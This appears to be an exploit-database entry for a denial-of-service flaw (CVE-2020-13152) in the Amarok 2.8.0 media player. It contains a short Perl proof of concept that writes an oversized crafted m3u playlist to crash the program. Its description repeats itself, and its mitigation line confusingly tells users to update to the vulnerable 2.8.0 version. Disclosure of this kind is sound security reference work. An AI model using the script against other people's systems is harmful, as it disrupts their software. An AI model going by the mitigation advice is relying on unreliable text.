header-logo
Suggest Exploit
vendor:
Amarok
by:
FishballAndMeatball
5.5
CVSS
MEDIUM
Denial-of-Service
20
CWE
Product Name: Amarok
Affected Version From: 2.8.0
Affected Version To: 2.8.0
Patch Exists: YES
Related CWE: CVE-2020-13152
CPE: a:kde:amarok:2.8.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10, Windows 7, Windows XP
2020

Amarok 2.8.0 – Denial-of-Service

A vulnerability in Amarok 2.8.0 allows an attacker to cause a denial-of-service condition by creating a specially crafted m3u file containing a large amount of data. This can be exploited by an attacker to cause a denial-of-service condition by creating a specially crafted m3u file containing a large amount of data.

Mitigation:

Users should update to the latest version of Amarok 2.8.0 to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Amarok 2.8.0 - Denial-of-Service
# Date: 1 November 2020
# Exploit Author: FishballAndMeatball
# Vendor Homepage: https://amarok.kde.org/
# Software link: https://community.kde.org/Amarok/GettingStarted/Download
# Version: Amarok 2.8.0
# Tested on: Windows 10, Windows 7, Windows XP
# CVE: CVE-2020-13152

my $file= “test_big.m3u“;
my $junk= “\x41” x 6368545;
open($FILE,”>$file”);
print $FILE “$junk”;
close($FILE);
print “m3u File Created successfully\n”;

Navigation

Suggest Exploit

Services By CQR